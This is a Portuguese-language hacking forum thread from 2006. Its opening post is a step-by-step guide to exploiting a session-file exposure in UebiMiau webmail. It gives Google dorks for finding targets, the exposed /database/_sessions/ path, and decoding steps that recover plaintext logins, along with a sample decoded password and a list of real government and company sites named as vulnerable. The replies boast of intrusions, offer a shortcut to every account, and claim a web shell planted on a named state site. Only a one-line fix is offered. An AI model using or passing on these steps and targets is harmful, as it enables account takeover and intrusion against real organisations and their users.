Uebimiau 2.7.2

Iniciado por Anonymous, 29 de Julho , 2006, 02:35:07 AM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Anonymous

Olá pessoal.

Existe um WebMail MUITO usado na net o UebiMiau, são muito sites usando, muitos mesmo.

Existe também uma grande quantidade de sites *.gov.br que usam esse WebMail, sem contar nas grandes empresas (S.A) que foi ai que descobri essa vulnerabilidade.

Somente UebiMiau com versões menores que 2.7.2 estão vulneraveis.

Seguinte, essa vulnerabilidade da acesso a path onde fica os arquivos de seção guardados, são arquivos temporários. Nesses arquivos contém dados das contas, são arquivos que são destruídos apos o usuário sair, mas acredito que pelo motivo dos usuários não saírem no link SAIR e sim no X ou mudam de site, esses arquivos continuem gravados na path.
Após você ter acesso a esses arquivos eles estarão criptografados, então você terá que descriptografar, é fácil explicarei detalhes por detalhes.

Primeiro passo: Achar sites com essa vulnerabilidade.

Procure no Google por:

"Powered by UebiMiau!"
"Powered by UebiMiau!" site:gov.br

Aparecerão muitos sites do tipo. www.exemplo.com.br/webmail/

=)

Segundo passo: Explorando os sites.

Após a pesquisa você achara sites do tipo
www.exemplo.com.br/webmail/
acrescente /database/_sessions/ após /webmail/
ficara assim. www.exemplo.com.br/webmail/database/_sessions/
Pronto se aparecer arquivos do tipo:
{435B5077BE08A-435B5077C2FF1-1130057847}.usf
O webmail está vulnerável, se caso não aparecer nada, (a pasta _sessions, estará vazia) é porque ninguém cometeu aquele erro de não clicar no SAIR pra destruir esse arquivo.
*Mas esta vulnerabilidade, porém sem nenhum arquivo.
Caso Aparecer, Page Not Found, ou, Sem autorização pra abrir a pasta, é porque não está vulnerável.

Terceiro Passo: Descriptografar.
Apos achar os arquivos *.usf abra-o e veras uma string do tipo:
YTo1OntzOjU6ImVtYWlsIjtzOjIwOiJkbWdpdGFqYWlAZG1nLmNvbS5iciI7czo
0OiJ1c2VyIjtzOjk6ImRtZ2l0YWphaSI7czo0OiJwYXNzIjtzOjY6Iml0YWphaSI
7czo2OiJzZXJ2ZXIiO3M6Nzoid2VibWFpbCI7czo1OiJzdGFydCI7aToxMTI5OT
M5MjQ3O30=

Bom aqui ela está criptografada, agora vamos descriptografá-la.

Método A:

Usamos o mIRC para executar essa proeza,
no mIRC digite na linha de conversação.. (onde você usa pra conversar)
//echo -a $decode(StringCriptografada, -m) e tecle enter.
pronto o resultado virá na hora.
*OBS: Não esqueça do // antes do echo, e do ,-m no final.
*OBS: Não use strings muito grande pra descriptografar, pois o mirc ele limita caracteres, caso você colocar a string após o $decode( e depois vc for acrescentar os ,-m) e cada tecla que pressionar você ouvir um BIP soar, é porque o limite foi atingido, então comece a deletar o final da string criptografada.
Pronto, após aparecer o resultado. que é algo como:
a:9:{s:5:"email";s:18:"richard@TESTE.COM.br";s:4:"user";s:7:"richard";
s:4:"pass";s:6:"999611";s:6:"server";s:4:"mail";s:5:"start";i:1130057847;
s:4:"auth";b:1;s:7:"folders";a:5:{i:0;a:1:{s:4:"name";s:5:"inbox";
}i:1;a:1:{s:4:"name";s:5:"trash";}i:2;a:1:{s:4:"name";s:4:"sent";}i:3;
a:1:{s:4:"name";s:8:"silvania";}i:4;
você vai ter os seguintes dados necessários para login:
USER: richard
PASS: 999611

Método B (O mais fácil):
Copie todo o código para o descriptografador, apague tudo até ficar 5 linhas.
Clique em "Safe Decode as Text"
a:9:{s:5:"email";s:18:"richard@TESTE.COM.br";s:4:"user";s:7:"richard";
s:4:"pass";s:6:"999611";s:6:"server";s:4:"mail";s:5:"start";i:1130057847;
s:4:"auth";b:1;s:7:"folders";a:5:{i:0;a:1:{s:4:"name";s:5:"inbox";
}i:1;a:1:{s:4:"name";s:5:"trash";}i:2;a:1:{s:4:"name";s:4:"sent";}i:3;
a:1:{s:4:"name";s:8:"silvania";}i:4;
USER: richard
PASS: 999611
LINK:

[url=http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx]http://www.opinionatedgeek.com/dotnet/t ... fault.aspx
[/url]

Agora é só voltar para a tela de login e se logar. (Só tirar o  /database/_sessions/ do endereço.)

Pronto, você teve sucesso.

Caso você saiba o LOGIN de algum usuário use
http://www.exemplo.com/database/user_domain/
Onde "user" é o usuário alvo e "domain" é o domínio alvo.
Aí você entrara no "esqueleto" da conta do usuário, tendo acesso aos e-mails e tudo mais.

Bom é isso, caso tenham duvidas postem ai.

Lembrando cuidado ao mexer com *.gov.br, já falei, não me responsabilizo por nada. pois vocês fazem o que bem entender, minha intenção foi ceder conhecimento para fins produtivos, caso você seja um admin e possui o Uebimiau, você saberá que deve corrigí-lo.

Correção:

Acrescente um arquivo chamado index.php dentro de cada pasta.

Sites Vulneráveis:
GOVS:

http://webmail.eldorado.rs.gov.br/database/_sessions/
http://webmail.dmaepc.mg.gov.br/database/_sessions/
http://www.sectec.go.gov.br/webmail/database/_sessions/
https://ssmfinf01.smf.maceio.al.gov.br/ ... _sessions/
http://www.tcm.pa.gov.br/webmail/database/_sessions/
http://www.cmm.sc.gov.br/email/database/_sessions/
http://www.tce.rr.gov.br/webmail/database/_sessions/
http://webmail.jucema.ma.gov.br/database/_sessions/

OUTROS:

http://www.sle.br/umail/database/_sessions/
http://www.atima.com.br/webmail2/database/_sessions/
http://www.controlc.com.br/webmail2/database/_sessions/
http://www.cotrimaio.com.br/webmail2/da ... _sessions/
http://webmail2.gam.co.za/database/_sessions/

Video-Aula:

http://s10.quicksharing.com/d/7931200/1154028753/Uebimiau_2.7.2.wmv

Até que enfim, chegamos ao final, hehehe, faça bom proveito, lembrando que o conhecimento adquirido aqui foi só para o aprendizado, tudo o que você fizer poderá prejudicar a terceiros, caso isso aconteça é de sua responsabilidade.

OBS: Tentei explicar o mais claro possível fornecendo os LINKS para os programas e dando EXEMPLOS, não faça perguntas idiotas.

Skayler

Boa cara.
Mais eu já conhecia, hehe.
Bem legal... ;)

[]'s


Skayler
Away

Anonymous

Muito bom cara, eu também já conhecia mas antigamente estava mal explicado, vou até testar. Valeu.

Emilly Rose

Eu ja tinha ouvido falar mas nunca parei pra saber como era..
Parabens
Witherless Rose

HadeS

Isso é veeeelho. Foi postado pelo rox_nxr a muito tempo no antigo Darkers.

HadeS

Anonymous

deu certo
so q tinha duas contas soh
azar neh ? =/

Anonymous

ae kra axei um jeito mais eficiente

se você so colocar /database/ na frente
vc tem acesso a todas as contas e n precisa fica decriptografando

eh mais facil neh

Anonymous

Muito bom, mas se você quer ver o e-mail bonitinho tem que descriptografar mesmo, rsrsrs. Valeu pela ajuda.

Pra descriptografar qualquer coisa, peguem o CAIN. :) Até mais.

Anonymous

Bom na verdade quem postou no antigo Darkers sobre essa vul foi eu, usava o nick N0X_1_73R e nao rox_nxr como citado, realmente ja invadi grandes sitemas atravez dessa vuln é poderosa pelo fato de revelar a senha.

É uma vuln importante, facil de explorar e muito simples de  corrigir (caso seja admin.. etc).

Muito bom, gostei das palavras porem faltou a FONTE, de onde tirou isso ????, poste a FONTE por favor.

Anonymous

:o lindooooooo de ver
abalo
=DDDD
o email da minha facul era desse uebmiau
so q ja nao eh mais vulneravel

HadeS

Bah NOX, você entendeu né? Dá pra saber quem é.

HadeS

Anonymous

Citação de: "HadeS"Bah NOX, você entendeu né? Dá pra saber quem é.

Claro, no stress. :)

rog

lol

esse aqui ja tem dono

http://www.tce.rr.gov.br

o rog tem um s57.php nele

lol
realty.sys is corrupt :  reboot the universe (Y/N)